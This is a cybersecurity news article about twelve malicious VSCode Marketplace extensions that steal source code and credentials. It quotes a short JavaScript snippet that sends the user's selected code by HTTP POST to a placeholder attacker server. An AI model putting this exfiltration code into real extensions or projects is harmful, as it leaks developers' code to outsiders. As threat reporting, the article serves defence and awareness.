Cyber Security News

12 Malicious Extension in VSCode Marketplace Steal Source Code and Exfiltrate Login Credentials

A recent discovery has shaken the Visual Studio Code (VSCode) ecosystem, unveiling a sophisticated supply chain attack targeting developers worldwide.

At least a dozen malicious extensions were identified in the official VSCode Marketplace, with four remaining active as of the time of reporting.

These plugins, some disguised as legitimate productivity tools, infiltrated developer environments, laying the groundwork for large-scale data exfiltration and credential theft.

The growing reliance on IDE plugins and AI-powered code assistants has inadvertently broadened the attack surface, making such platforms appetizing targets for sophisticated attackers.

The incident’s scope underscores the fragility of the software supply chain. Once installed, these extensions possess extensive access, enabling them to silently pilfer project code, sensitive data, and even clipboard contents.

In several cases, the malicious payloads established persistent connections with attacker-controlled servers, effectively acting as covert backdoors within trusted coding environments.

Notably, HelixGuard researchers were the first to identify the coordinated nature of these attacks, highlighting that certain plugins—such as Christine-devops1234.scraper and Kodease.fyp-23-s2-08—leveraged various exfiltration techniques ranging from simple HTTP POST requests to persistent socket connections.

HelixGuard analysts uncovered that some variants actively monitored user code, configuration files, and even environment variables.

One plugin, for example, repeatedly invoked functions like document.getText(selection) to harvest selected source code, transmitting the results via HTTP to remote endpoints:-

let code = document.getText(selection);
code = code.split(" ").join("").toLowerCase();
axios.post('https://attacker-server/app', { code })

By embedding such routine data collection in seemingly harmless background tasks, the extensions evade most basic security scans.

While these is a typical infection chain that captures the stages from plugin installation to active data exfiltration and remote command execution.

This campaign’s sophistication spotlights the pressing need for heightened vigilance, rigorous plugin vetting, and real-time marketplace monitoring among developer communities.

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

New EDR-Redir V2 Blinds Windows Defender on Windows 11 With Fake Program Files

An upgraded release of tool EDR-Redir V2, designed to evade Endpoint Detection and Response (EDR)…

45 minutes ago

OpenAI’s New Aardvark GPT-5 Agent that Detects and Fixes Vulnerabilities Automatically

OpenAI has unveiled Aardvark, an autonomous AI agent powered by its cutting-edge GPT-5 model, designed…

3 hours ago

Agent Session Smuggling: How Malicious AI Hijacks Victim Agents

Security researchers have uncovered a sophisticated attack technique that exploits the trust relationships built into…

22 hours ago

Akira Ransomware Allegedly Claims Theft of 23GB in Apache OpenOffice Breach

The notorious Akira ransomware group announced on October 29, 2025, that it successfully breached the…

1 day ago

CISA Warns of Linux Kernel Use-After-Free Vulnerability Exploited in Attacks to Deploy Ransomware

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert about a…

1 day ago

Hackers Exploiting Cisco IOS XE Vulnerability in the Wild to Deploy BADCANDY Web Shell

Cybercriminals and state-sponsored actors are ramping up attacks on unpatched Cisco IOS XE devices across…

1 day ago